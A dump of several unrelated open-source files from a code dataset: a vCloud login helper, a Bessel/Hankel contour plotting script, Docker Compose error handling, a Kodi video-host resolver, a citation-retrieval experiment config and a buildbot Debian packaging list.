if not vca.login(token=vca.token, org=org, org_url=vca.vcloud_session.org_url):
raise VcaError("Failed to login to org", error=vca.response.content)
def vca_login(module):
service_type = module.params.get('service_type')
username = module.params.get('username')
password = module.params.get('password')
instance = module.params.get('instance_id')
org = module.params.get('org')
vdc_name = module.params.get('vdc_name')
service = module.params.get('service_id')
version = module.params.get('api_version')
verify = module.params.get('validate_certs')
_validate_module(module)
if not vdc_name and service_type == 'vchs':
vdc_name = module.params.get('service_id')
if not org and service_type == 'vchs':
org = vdc_name or service
if service_type == 'vcd':
host = module.params.get('host')
else:
host = LOGIN_HOST[service_type]
username = os.environ.get('VCA_USER', username)
password = os.environ.get('VCA_PASS', password)
if not username or not password:
msg = "Either the username or password is not set, please check args"
module.fail_json(msg=msg)
if service_type == 'vchs':
version = '5.6'
elif service_type == 'vcd' and not version:
version = '5.6'
vca = VCA(host=host, username=username,
service_type=SERVICE_MAP[service_type],
version=version, verify=verify)
try:
if service_type == 'vca':
_vca_login(vca, password, instance)
elif service_type == 'vchs':
_vchs_login(vca, password, service, org)
elif service_type == 'vcd':
_vcd_login(vca, password, org)
except VcaError as e:
module.fail_json(msg=e.message, **e.kwargs)
return vca
| gpl-3.0 | 7,062,952,371,725,994,000 | 32.777448 | 90 | 0.604498 | false |
rosskynch/complex_bessel | tests/hankelcontours.py | 2 | 1310 | # Python script to generate the contour plot
# seen in Abramowitz & Stegun's book on p. 359.
# The values are imported from the file "contours.dat"
#
# The numpy and matplotlib modules are required for this script to run
#
# Joey Dumont <[email protected]>
# Denis Gagnon <[email protected]>
#
import numpy as np
import matplotlib.pyplot as plt
plt.rcParams['text.usetex'] = True
plt.rcParams['font.size'] = 10
plt.rcParams['legend.numpoints'] = 3
Data = np.loadtxt('contours.dat')
x = Data[:,0]
y = Data[:,1]
M = np.sqrt(Data[:,2]**2 + Data[:,3]**2)
Z = Data[:,2]+np.complex(0,1)*Data[:,3]
phi=(180/np.pi)*np.abs(np.arctan2(Data[:,3],Data[:,2]))
Dimension = np.sqrt(M.size)
X=np.linspace(x.min(),x.max(), Dimension)
Y=np.linspace(y.min(),y.max(), Dimension)
Xg,Yg=np.meshgrid(X,Y)
M0=np.reshape(M,[Dimension, Dimension])
phi0=np.reshape(phi,[Dimension, Dimension])
contourM=np.linspace(0.2,3.2,16)
contourP=np.linspace(0,360,15)
plt.figure(figsize=(7,5))
plt.contour(Xg,Yg,M0,contourM)
CS = plt.contour(Xg,Yg,phi0,contourP,colors='k',linestyles='dashdot')
Xcut=[-4.0,0]
Ycut=[0,0]
plt.plot(Xcut,Ycut,lw=2.5,color='k')
plt.xlabel('$x$')
plt.ylabel('$y$')
plt.title('Contour lines of the modulus and phase of $H_0^{(1)}(x+iy)$ \n (reproduced from Abramowitz \& Stegun, p.359)')
plt.savefig('contours.png')
| lgpl-3.0 | -98,053,031,246,251,260 | 23.259259 | 121 | 0.682443 | false |
shin-/compose | compose/cli/errors.py | 4 | 5174 | from __future__ import absolute_import
from __future__ import unicode_literals
import contextlib
import logging
import socket
from distutils.spawn import find_executable
from textwrap import dedent
from docker.errors import APIError
from requests.exceptions import ConnectionError as RequestsConnectionError
from requests.exceptions import ReadTimeout
from requests.exceptions import SSLError
from requests.packages.urllib3.exceptions import ReadTimeoutError
from ..const import API_VERSION_TO_ENGINE_VERSION
from .utils import binarystr_to_unicode
from .utils import is_docker_for_mac_installed
from .utils import is_mac
from .utils import is_ubuntu
from .utils import is_windows
log = logging.getLogger(__name__)
class UserError(Exception):
def __init__(self, msg):
self.msg = dedent(msg).strip()
def __unicode__(self):
return self.msg
__str__ = __unicode__
class ConnectionError(Exception):
pass
@contextlib.contextmanager
def handle_connection_errors(client):
try:
yield
except SSLError as e:
log.error('SSL error: %s' % e)
raise ConnectionError()
except RequestsConnectionError as e:
if e.args and isinstance(e.args[0], ReadTimeoutError):
log_timeout_error(client.timeout)
raise ConnectionError()
exit_with_error(get_conn_error_message(client.base_url))
except APIError as e:
log_api_error(e, client.api_version)
raise ConnectionError()
except (ReadTimeout, socket.timeout) as e:
log_timeout_error(client.timeout)
raise ConnectionError()
except Exception as e:
if is_windows():
import pywintypes
if isinstance(e, pywintypes.error):
log_windows_pipe_error(e)
raise ConnectionError()
raise
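# Minimal usage sketch (the `project` object is an assumption, not defined in
# this module): wrap calls that talk to the Docker daemon so connection
# problems are logged and surfaced as ConnectionError.
#
#   with handle_connection_errors(project.client):
#       project.up()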
def log_windows_pipe_error(exc):
if exc.winerror == 232: # https://github.com/docker/compose/issues/5005
log.error(
"The current Compose file version is not compatible with your engine version. "
"Please upgrade your Compose file to a more recent version, or set "
"a COMPOSE_API_VERSION in your environment."
)
else:
log.error(
"Windows named pipe error: {} (code: {})".format(
binarystr_to_unicode(exc.strerror), exc.winerror
)
)
def log_timeout_error(timeout):
log.error(
"An HTTP request took too long to complete. Retry with --verbose to "
"obtain debug information.\n"
"If you encounter this issue regularly because of slow network "
"conditions, consider setting COMPOSE_HTTP_TIMEOUT to a higher "
"value (current value: %s)." % timeout)
def log_api_error(e, client_version):
explanation = binarystr_to_unicode(e.explanation)
if 'client is newer than server' not in explanation:
log.error(explanation)
return
version = API_VERSION_TO_ENGINE_VERSION.get(client_version)
if not version:
# They've set a custom API version
log.error(explanation)
return
log.error(
"The Docker Engine version is less than the minimum required by "
"Compose. Your current project requires a Docker Engine of "
"version {version} or greater.".format(version=version)
)
def exit_with_error(msg):
log.error(dedent(msg).strip())
raise ConnectionError()
def get_conn_error_message(url):
try:
if find_executable('docker') is None:
return docker_not_found_msg("Couldn't connect to Docker daemon.")
if is_docker_for_mac_installed():
return conn_error_docker_for_mac
if find_executable('docker-machine') is not None:
return conn_error_docker_machine
except UnicodeDecodeError:
# https://github.com/docker/compose/issues/5442
# Ignore the error and print the generic message instead.
pass
return conn_error_generic.format(url=url)
def docker_not_found_msg(problem):
return "{} You might need to install Docker:\n\n{}".format(
problem, docker_install_url())
def docker_install_url():
if is_mac():
return docker_install_url_mac
elif is_ubuntu():
return docker_install_url_ubuntu
elif is_windows():
return docker_install_url_windows
else:
return docker_install_url_generic
docker_install_url_mac = "https://docs.docker.com/engine/installation/mac/"
docker_install_url_ubuntu = "https://docs.docker.com/engine/installation/ubuntulinux/"
docker_install_url_windows = "https://docs.docker.com/engine/installation/windows/"
docker_install_url_generic = "https://docs.docker.com/engine/installation/"
conn_error_docker_machine = """
Couldn't connect to Docker daemon - you might need to run `docker-machine start default`.
"""
conn_error_docker_for_mac = """
Couldn't connect to Docker daemon. You might need to start Docker for Mac.
"""
conn_error_generic = """
Couldn't connect to Docker daemon at {url} - is it running?
If it's at a non-standard location, specify the URL with the DOCKER_HOST environment variable.
"""
| apache-2.0 | 4,879,124,926,595,999,000 | 29.797619 | 98 | 0.672014 | false |
listamilton/supermilton.repository | plugin.video.traquinas/resources/lib/resolvers/xvidstage.py | 23 | 1461 | # -*- coding: utf-8 -*-
'''
Specto Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
from resources.lib.libraries import client
from resources.lib.libraries import jsunpack
def resolve(url):
try:
url = url.replace('/embed-', '/')
url = re.compile('//.+?/([\w]+)').findall(url)[0]
url = 'http://xvidstage.com/embed-%s.html' % url
result = client.request(url, mobile=True)
result = re.compile('(eval.*?\)\)\))').findall(result)[-1]
result = jsunpack.unpack(result)
url = client.parseDOM(result, 'embed', ret='src')
url += re.compile("'file' *, *'(.+?)'").findall(result)
url = [i for i in url if not i.endswith('.srt')]
url = 'http://' + url[0].split('://', 1)[-1]
return url
except:
return
| gpl-2.0 | -7,894,659,031,319,673,000 | 30.76087 | 73 | 0.632444 | false |
danieldmm/minerva | evaluation_runs/aac_lrec_full_text_experiments.py | 1 | 12208 | # Experiments with the ACL corpus like the ones for LREC'16
#
# Copyright: (c) Daniel Duma 2016
# Author: Daniel Duma <[email protected]>
# For license information, see LICENSE.TXT
from __future__ import print_function
from __future__ import absolute_import
from proc.nlp_functions import AZ_ZONES_LIST, CORESC_LIST
import db.corpora as cp
from evaluation.experiment import Experiment
# BOW files to prebuild for generating document representation.
prebuild_bows={
##"full_text":{"function":"getDocBOWfull", "parameters":[1]},
##"title_abstract":{"function":"getDocBOWTitleAbstract", "parameters":[1]},
##"passage":{"function":"getDocBOWpassagesMulti", "parameters":[150,175,200,250,300,350,400,450]},
##"inlink_context":{"function":"generateDocBOWInlinkContext", "parameters":[200] },
##"ilc_AZ":{"function":"generateDocBOW_ILC_Annotated", "parameters":["paragraph","1up_1down","1up","1only"] },
"az_annotated":{"function":"getDocBOWannotated", "parameters":[1]},
##"section_annotated":{"function":"getDocBOWannotatedSections", "parameters":[1]},
}
# bow_name refers to the name of the file containing the prebuilt BOWs to load
prebuild_indeces={
## "full_text":{"type":"standard_multi", "bow_name":"full_text", "parameters":[1]},
## "title_abstract":{"type":"standard_multi", "bow_name":"title_abstract", "parameters":[1]},
## "passage":{"type":"standard_multi", "bow_name":"passage", "parameters":[150,175,200,250,300,350,400,450]},
## "inlink_context":{"type":"standard_multi", "bow_name":"inlink_context", "parameters":[5, 10, 15, 20, 30, 40, 50]},
## "inlink_context_year":{"type":"standard_multi", "bow_name":"inlink_context", "parameters":[5, 10, 15, 20, 30, 40, 50], "options":{"max_year":True}},
"az_annotated_aac_2010":{"type":"standard_multi",
"bow_name":"az_annotated", # bow to load
"parameters":[1], # parameter has to match a parameter of a prebuilt bow
},
## "section_annotated":{"type":"standard_multi", "bow_methods":[("section_annotated",[1])], "parameters":[1]},
## # this is just ilc but split by AZ
## "ilc_AZ":{"type":"standard_multi", "bow_name":"ilc_AZ", "parameters":["paragraph","1up_1down","1up","1only"]},
## "ilc_full_text":{"type":"ilc_mashup", "ilc_method":"inlink_context", "mashup_method":"full_text", "ilc_parameters":[10,20,30, 40, 50], "parameters":[1]},
## "ilc_year_full_text":{"type":"ilc_mashup", "ilc_method":"inlink_context", "mashup_method":"full_text", "ilc_parameters":[10,20,30, 40, 50], "parameters":[1], "options":{"max_year":True}},
## "ilc_section_annotated":{"type":"ilc_mashup", "ilc_method":"inlink_context", "mashup_method":"section_annotated", "ilc_parameters":[10,20,30, 40, 50], "parameters":[1]},
## "ilc_passage":{"type":"ilc_mashup", "ilc_method":"inlink_context", "mashup_method":"passage","ilc_parameters":[5, 10, 20, 30, 40, 50], "parameters":[250,300,350]},
# this is just normal az_annotated + normal ilc
#### "ilc_az_annotated":{"type":"ilc_mashup", "ilc_method":"inlink_context", "mashup_method":"az_annotated", "ilc_parameters":[5, 10,20,30, 40, 50], "parameters":[1]},
##
#### # this is az-annotated text + az-annotated ilc
#### "az_ilc_az_":{"type":"ilc_mashup", "ilc_method":"ilc_AZ", "mashup_method":"az_annotated", "ilc_parameters":["paragraph","1up_1down","1up","1only"], "parameters":[1]},
}
prebuild_general_indexes={
## "full_text":{"type":"standard_multi", "bow_name":"full_text", "parameters":[1]},
## "ilc_full_text":{"type":"standard_multi", "bow_name":"full_text", "parameters":[1]},
"az_annotated_aac_2010":{"type":"standard_multi",
"bow_name":"az_annotated", # bow to load
"parameters":[1], # parameter has to match a parameter of a prebuilt bow
"max_year":2010 # cut-off point for adding files to index
},
}
doc_methods={
## "full_text":{"type":"standard_multi", "index":"full_text", "parameters":[1], "runtime_parameters":["text"]},
## "title_abstract":{"type":"standard_multi", "index":"title_abstract", "parameters":[1], "runtime_parameters":{"text":"1"}},
## "passage":{"type":"standard_multi", "index":"passage", "parameters":[250,350,400], "runtime_parameters":{"text":"1"}},
##
## "inlink_context":{"type":"standard_multi", "index":"inlink_context",
## "parameters": [10, 20, 30], "runtime_parameters":{"inlink_context":"1"}},
##
## "inlink_context_year":{"type":"standard_multi", "index":"inlink_context_year",
## "parameters": [10, 20, 30], "runtime_parameters":{"inlink_context":"1"}},
##
## "ilc_passage":{"type":"ilc_mashup", "index":"ilc_passage", "mashup_method":"passage","ilc_parameters":[10, 20, 30, 40, 50],
## "parameters":[250,350], "runtime_parameters":{"text":"1","inlink_context":"1"}},
"az_annotated":{"type":"annotated_boost", "index":"az_annotated_aac_2010", "parameters":[1], "runtime_parameters":{
"AZ_ALL":AZ_ZONES_LIST + ["_full_text"],
## "CSC_ALL":CORESC_LIST,
}},
## "section":{"type":"annotated_boost", "index":"section_annotated", "parameters":[1], "runtime_parameters":
## {
## "title_abstract":{"title":"1","abstract":"1"},
## "full_text":["title","abstract","text"],
## }},
##
## "ilc":{"type":"ilc_annotated_boost", "index":"ilc_section_annotated", "ilc_parameters":[10, 20, 30, 40, 50], "parameters":[1], "runtime_parameters":
## {
## "title_abstract":["title","abstract","inlink_context"],
## "full_text":["title", "abstract","text","inlink_context"],
## }},
# this is normal ilc + az_annotated
## "ilc_az_annotated":{"type":"ilc_annotated_boost", "index":"ilc_az_annotated", "parameters":[1], "ilc_parameters":[10, 20, 30, 40, 50], "runtime_parameters":
## {"ALL":["AIM","BAS","BKG","CTR","OTH","OWN","TXT","inlink_context"],
## }},
# this is sentence-based ILC, annotated with AZ and CSC
## "ilc_AZ":{"type":"annotated_boost", "index":"ilc_AZ", "parameters":["paragraph","1up_1down","1up","1only"], "runtime_parameters":
## {
## "ALL":["ilc_AZ_AIM","ilc_AZ_BAS","ilc_AZ_BKG","ilc_AZ_CTR","ilc_AZ_OTH","ilc_AZ_OWN","ilc_AZ_TXT"]
## }},
## "ilc_AZ":{"type":"annotated_boost", "index":"ilc_AZ", "parameters":["paragraph"], "runtime_parameters":
## {
## "AZ":["ilc_AZ_AIM","ilc_AZ_BAS","ilc_AZ_BKG","ilc_AZ_CTR","ilc_AZ_OTH","ilc_AZ_OWN","ilc_AZ_TXT"],
## "CSC": ["ilc_CSC_"+zone for zone in CORESC_LIST],
## }},
# this is sentence-based AZ and AZ-annotated document contents
## "az_ilc_az":{"type":"ilc_annotated_boost", "index":"az_ilc_az", "parameters":[],
## "ilc_parameters":["1only","1up","1up1down","paragraph"],
## "runtime_parameters":
## {
## "ALL":["ilc_AZ_AIM","ilc_AZ_BAS","ilc_AZ_BKG","ilc_AZ_CTR","ilc_AZ_OTH","ilc_AZ_OWN","ilc_AZ_TXT","ilc_AZ_AIM"],
###### "OTH":{"AIM":"0","BAS":"0","BKG":"0","CTR":"0","OTH":"1","OWN":"0","TXT":"0","inlink_context":1},
###### "OWN":{"AIM":"0","BAS":"0","BKG":"0","CTR":"0","OTH":"0","OWN":"1","TXT":"0","inlink_context":1},
## }},
}
# this is the dict of query extraction methods
qmethods={
## "window":{"parameters":[
## (3,3),
## (5,5),
## (10,10),
## (5,10),
## (10,5),
## (20,20),
## (20,10),
## (10,20),
## (30,30),
## (50,50),
## (100,100),
## (500,500),
## ],
## "method":"Window",
## },
"sentence":{"parameters":[
## "1only",
## "paragraph",
## "1up",
## "0up_1down",
"1up_1down",
## "2up_2down"
],
"method":"Sentences",
},
## "annotated_sentence":{"parameters":[
## "pno",
## "po",
## "no",
## "n",
## "p",
## ],
## "method":"SelectedSentences",
## },
}
experiment={
"name":"aac_lrec_experiments",
"description":
"""Re-run the LREC experiments with AZ instead of CoreSC, including _full_text for search""",
# dict of bag-of-word document representations to prebuild
"prebuild_bows":prebuild_bows,
# dict of per-file indexes to prebuild
"prebuild_indeces":prebuild_indeces,
# dict of general indexes to prebuild
"prebuild_general_indexes":prebuild_general_indexes,
# dictionary of document representation methods to test
"doc_methods":doc_methods,
# dictionary of query generation methods to test
"qmethods":qmethods,
# list of files in the test set
"test_files":[],
# SQL condition to automatically generate the list above
"test_files_condition":"metadata.num_in_collection_references:>0 AND metadata.year:>2010",
# This lets us pick just the first N files
"max_test_files":1000,
# Use Lucene DefaultSimilarity? As opposed to FieldAgnosticSimilarity
"use_default_similarity":True,
# Annotate sentences with AZ/CoreSC/etc?
"rhetorical_annotations":[],
# Run annotators? If False, it is assumed the sentences are already annotated
"run_rhetorical_annotators":False,
# Separate queries by AZ/CSC, etc?
"use_rhetorical_annotation":True,
"weight_values":[],
# ?
## "split_set":None,
    # use full-collection retrieval? If False, it runs "citation resolution"
"full_corpus":True,
# "compute_once","train_weights"
"type":"train_weights",
# If full_corpus, this is the cut-off year for including documents in the general index.
# In this way we can separate test files and retrieval files.
"index_max_year": 2010,
# how many chunks to split each file for statistics on where the citation occurs
"numchunks":10,
# name of CSV file to save results in
"output_filename":"results.csv",
"pivot_table":"",
"max_results_recall":200,
# should queries be classified based on some rhetorical class of the sentence: "az", "csc_type"
"queries_classification":"az",
# do not process more than this number of queries of the same type (type on line above)
"max_per_class_results" : 1000,
# of all precomputed queries, which classes should be processed/evaluated?
"queries_to_process":["ALL"],
# what "zones" to try to train weights for
"train_weights_for": AZ_ZONES_LIST, #["Bac"], ["Hyp","Mot","Bac","Goa","Obj","Met","Exp","Mod","Obs","Res","Con"]
# add another doc_method showing the score based on analytical random chance?
"add_random_control_result": False,
"precomputed_queries_filename":"precomputed_queries.json",
"files_dict_filename":"files_dict.json",
}
options={
"run_prebuild_bows":0, # should the whole BOW building process run?
"overwrite_existing_bows":0, # if a BOW exists already, should we overwrite it?
"build_indexes":0, # rebuild indices?
"overwrite_existing_queries":0, # force rebuilding of queries too?
"run_precompute_retrieval":0, # only applies if type == "train_weights"
"clear_existing_prr_results":False, # delete previous precomputed results? i.e. start from scratch
"override_folds":4,
"override_metric":"avg_ndcg",
}
def main():
from multi.celery_app import MINERVA_ELASTICSEARCH_ENDPOINT
cp.useElasticCorpus()
cp.Corpus.connectCorpus("g:\\nlp\\phd\\aac", endpoint=MINERVA_ELASTICSEARCH_ENDPOINT)
cp.Corpus.setCorpusFilter("AAC")
## experiment["test_files"]=["456f8c80-9807-46a9-8455-cd4a7e346f9d"]
exp=Experiment(experiment, options, False)
exp.run()
if __name__ == '__main__':
main()
## from proc.doc_representation import getDictOfLuceneIndeces
## from evaluation.base_pipeline import getDictOfTestingMethods
## print(getDictOfLuceneIndeces(prebuild_general_indexes))
## print(getDictOfTestingMethods(doc_methods))
| gpl-3.0 | 7,758,306,421,760,707,000 | 47.444444 | 193 | 0.594938 | false |
guilhermelawless/randgen_omni_dataset | randgen_omni_dataset/src/randgen_omni_dataset/omni_custom.py | 1 | 8687 | import rospy
import tf
import random
from read_omni_dataset.msg import *
from randgen_omni_dataset.msg import *
from geometry_msgs.msg import PoseStamped, PoseWithCovariance, PointStamped, Point
from visualization_msgs.msg import Marker, MarkerArray
from randgen_omni_dataset.robot import norm2
GLOBAL_FRAME = 'world'
MAX_DIST = 3.5
class OmniCustom():
# This class will transform messages and TFs to our custom msg format for the OMNI dataset
def __init__(self, topic_gt='/gtData'):
# type: (str) -> None
# initiate main GT message
self.gt = LRMGTData()
self.gt.orangeBall3DGTposition.found = False
# figure out information on existing robots
try:
playing_robots = rospy.get_param('PLAYING_ROBOTS')
except rospy.ROSException, err:
rospy.logerr('Error in parameter server - %s', err)
raise
except KeyError, err:
rospy.logerr('Value of %s not set', err)
raise
# save number of robots available
self.numberRobots = len(playing_robots)
# create a tf listener
self.listener = tf.TransformListener()
# initiate the publisher for the GT msg
self.publisher_gt = rospy.Publisher(topic_gt, LRMGTData, queue_size=10)
# iterate through the playing robots list, building our list of PoseWithCovariance msgs
list_ctr = 0
self.publishers_lm = []
self.publishers_target = []
self.publishers_robs = []
self.heights = []
for idx, running in enumerate(playing_robots):
# robot ID and name
idx += 1
idx_s = str(idx)
name = 'omni' + idx_s
# add a new PoseWithCovariance object to our poseOMNI list in the GT message
self.gt.poseOMNI.append(PoseWithCovariance())
# add a new bool to our foundOMNI list in the GT message
# will be True when first message comes
self.gt.foundOMNI.append(False)
# robot height
if rospy.has_param(name + '/height'):
self.heights.append(rospy.get_param(name + '/height'))
else:
rospy.logfatal(name + ' height not set')
# add subscriber to its pose, with an additional argument concerning the list position
rospy.Subscriber(name + '/simPose', PoseStamped, self.robot_pose_callback, list_ctr)
# initiate the publisher for the landmarks observations msg
self.publishers_lm.append(rospy.Publisher(name + '/landmarkspositions', LRMLandmarksData, queue_size=10))
# add subscriber to the landmark observations with argument to list id
rospy.Subscriber(name + '/landmarkObs', MarkerArray, self.landmarks_callback, list_ctr)
# initiate the publisher for the target observation msg
self.publishers_target.append(rospy.Publisher(name + '/orangeball3Dposition', BallData, queue_size=10))
# add subscriber to the target observations with argument to list id
rospy.Subscriber(name + '/targetObs', Marker, self.target_callback, list_ctr)
# publisher for the robot observation array msg
self.publishers_robs.append(rospy.Publisher(name + '/robotsobservations', RobotObservationArray, queue_size=10))
# subscriber to robot observations
rospy.Subscriber(name + '/robotObs', MarkerArray, self.robot_observations_callback, list_ctr)
            # wait for the odometry service to be available before continuing
rospy.wait_for_service(name + '/genOdometry/change_state')
# increment counter
list_ctr += 1
# subscriber to target gt data
self.sub_target = rospy.Subscriber('/target/simPose', PointStamped, self.target_pose_callback, queue_size=5)
def robot_pose_callback(self, msg, list_id):
# type: (PoseStamped, int) -> None
# update this robot's information in our GT message
self.gt.foundOMNI[list_id] = True
# update time stamp to latest msg time
self.gt.header.stamp = msg.header.stamp
# transform the pose from this robot frame to the global frame, using the tf listener
try:
# find latest time for transformation
msg.header.stamp = self.listener.getLatestCommonTime(GLOBAL_FRAME, msg.header.frame_id)
new_pose = self.listener.transformPose(GLOBAL_FRAME, msg)
except tf.Exception, err:
rospy.logdebug("TF Exception when transforming other robots - %s", err)
return
# insert new pose in the GT message
self.gt.poseOMNI[list_id].pose = new_pose.pose
# if all robots have been found, publish the GT message
if self.numberRobots == sum(found is True for found in self.gt.foundOMNI):
try:
self.publisher_gt.publish(self.gt)
except rospy.ROSException, err:
rospy.logdebug('ROSException - %s', err)
def target_pose_callback(self, msg):
# type: (PointStamped) -> None
# update our GT message with the new information
self.gt.orangeBall3DGTposition.found = True
self.gt.orangeBall3DGTposition.header.stamp = msg.header.stamp
self.gt.orangeBall3DGTposition.x = msg.point.x
self.gt.orangeBall3DGTposition.y = msg.point.y
self.gt.orangeBall3DGTposition.z = msg.point.z
# publish this message
try:
self.publisher_gt.publish(self.gt)
except rospy.ROSException, err:
rospy.logdebug('ROSException - %s', err)
def landmarks_callback(self, msg, list_id):
        # type: (MarkerArray, int) -> None
# create msg and insert information
lm_msg = LRMLandmarksData()
lm_msg.header.stamp = rospy.Time.now()
for marker in msg.markers:
# Our point of interest is the 2nd in the points list
point = marker.points[1]
# Add x and y
lm_msg.x.append(point.x)
lm_msg.y.append(point.y)
# Simulate the area expected as a function of distance to landmark with a little randomness
dist = norm2(point.x, point.y)
lm_msg.AreaLandMarkExpectedinPixels.append(MAX_DIST)
            # the random offset is between -1 and 1; the result is clamped to the range [0, MAX_DIST]
lm_msg.AreaLandMarkActualinPixels.append(max(0, min(dist + (random.random()*2 - 1), MAX_DIST)))
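            # e.g. (illustrative): for a landmark at distance 2.0 the reported
            # "actual" value lands somewhere in [1.0, 3.0]; it can never drop
            # below 0 or exceed MAX_DIST (3.5).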
# Add found
lm_msg.found.append(marker.text == 'Seen')
# publish with updated information
try:
self.publishers_lm[list_id].publish(lm_msg)
except rospy.ROSException, err:
rospy.logdebug('ROSException - %s', err)
def target_callback(self, msg, list_id):
        # type: (Marker, int) -> None
# create msg and insert information
ball_msg = BallData()
ball_msg.header.stamp = msg.header.stamp
# Our point of interest is the 2nd in the points list
point = msg.points[1]
# Add x and y
ball_msg.x = point.x
ball_msg.y = point.y
ball_msg.z = point.z + self.heights[list_id]
# Add found - this is my way of coding if the ball is seen in the Marker message
ball_msg.found = (msg.text == 'Seen')
# ignoring the mismatchfactor since it's not being used by the algorithm
# publish with updated information
try:
self.publishers_target[list_id].publish(ball_msg)
except rospy.ROSException, err:
rospy.logdebug('ROSException - %s', err)
def robot_observations_callback(self, msg, list_id):
        # type: (MarkerArray, int) -> None
if len(msg.markers) == 0:
return
# create msg and insert information
robs_msg = RobotObservationArray()
robs_msg.header = msg.markers[0].header
robs_msg.self_id = int(robs_msg.header.frame_id[-1])
# information encoded in the 2nd point of the marker point list
for marker in msg.markers:
obs = RobotObservation(idx = marker.id,
x = marker.points[1].x,
y = marker.points[1].y,
occluded = (marker.text == 'NotSeen') )
robs_msg.observations.append(obs)
# Publish
try:
self.publishers_robs[list_id].publish(robs_msg)
except rospy.ROSException, err:
rospy.logdebug('ROSException - %s', err)
| gpl-3.0 | -5,166,600,241,205,232,000 | 37.955157 | 124 | 0.612524 | false |
nextgis/buildbot | makedeb.py | 1 | 12823 | # -*- python -*-
# ex: set syntax=python:
# production builds into nextgis ppa
from buildbot.plugins import *
import os
c = {}
repositories = [
{'repo':'lib_geos', 'deb':'geos', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'lib_proj', 'deb':'proj', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'lib_geotiff', 'deb':'libgeotiff', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'lib_opencad', 'deb':'opencad', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'lib_oci', 'deb':'oci', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'lib_gdal', 'deb':'gdal', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'lib_spatialite', 'deb':'spatialite', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'mapserver', 'deb':'mapserver', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'nextgisutilities', 'deb':'nextgisutilities', 'repo_root':'git://github.com', 'org': 'nextgis', 'os': ['bionic', 'buster', 'focal',], 'repo_id':12, 'apt_repos':[{
'repka_id':11,
'type':'repka',
},]
},
{'repo':'postgis', 'deb':'postgis', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os': ['bionic', 'buster', 'focal',], 'repo_id':11, 'apt_repos':[{
'deb':'deb http://apt.postgresql.org/pub/repos/apt/ {}-pgdg main',
'key':'B97B0AFCAA1A47F044F244A07FCC7D46ACCC4CF8',
'keyserver':'keyserver.ubuntu.com',
'type':'deb',
},]
},
{'repo':'lib_ngstd', 'deb':'ngstd', 'repo_root':'git://github.com', 'org': 'nextgis', 'os': ['bionic', 'focal',], 'repo_id':11},
{'repo':'formbuilder', 'deb':'formbuilder', 'repo_root':'git://github.com', 'org': 'nextgis', 'os': ['bionic', 'focal',], 'repo_id':11},
{'repo':'manuscript', 'deb':'manuscript', 'repo_root':'git://github.com', 'org': 'nextgis', 'os': ['bionic','focal', ], 'repo_id':11},
{'repo':'mapnik-german-l10n', 'deb':'osml10n', 'repo_root':'git://github.com', 'org': 'nextgis', 'os': ['bionic', 'buster', 'focal',], 'repo_id':11, 'apt_repos':[{
'deb':'deb http://apt.postgresql.org/pub/repos/apt/ {}-pgdg main',
'key':'B97B0AFCAA1A47F044F244A07FCC7D46ACCC4CF8',
'keyserver':'keyserver.ubuntu.com',
'type':'deb',
},]
},
{'repo':'nextgisqgis', 'deb':'nextgisqgis', 'repo_root':'git://github.com', 'org': 'nextgis', 'os': ['bionic', 'focal', 'buster'], 'repo_id':11, 'branch': 'dev/up_to_3'},
{'repo':'qgis_headless', 'deb':'qgis-headless', 'repo_root':'https://gitlab.com:' + os.environ.get("BUILDBOT_APITOKEN_GITLAB_FULL") + '@gitlab.com', 'org': 'nextgis_private', 'os': ['bionic', 'focal', 'buster'], 'repo_id':11, 'branch': 'master'},
{'repo':'terratile', 'deb':'python-terratile', 'repo_root':'git://github.com', 'org': 'nextgis', 'os':['bionic', 'stretch', 'focal', 'buster'], 'repo_id':11, 'branch': 'gdal3'},
# {'repo':'lib_qscintilla', 'version':'2.10.4', 'deb':'qscintilla', 'subdir': '', 'repo_root':'nextgis-borsch', 'url': '', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
# {'repo':'py_future', 'version':'0.17.1', 'deb':'python-future', 'subdir': '', 'repo_root':'nextgis-borsch', 'url': 'https://files.pythonhosted.org/packages/90/52/e20466b85000a181e1e144fd8305caf2cf475e2f9674e797b222f8105f5f/future-0.17.1.tar.gz', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
# {'repo':'py_raven', 'version':'6.10.0', 'deb':'python-raven', 'subdir': '', 'repo_root':'nextgis-borsch', 'url': 'https://files.pythonhosted.org/packages/79/57/b74a86d74f96b224a477316d418389af9738ba7a63c829477e7a86dd6f47/raven-6.10.0.tar.gz', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
# {'repo':'py_setuptools', 'version':'40.6.3', 'deb':'python-setuptools', 'subdir': '', 'repo_root':'nextgis-borsch', 'url': 'https://files.pythonhosted.org/packages/37/1b/b25507861991beeade31473868463dad0e58b1978c209de27384ae541b0b/setuptools-40.6.3.zip', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
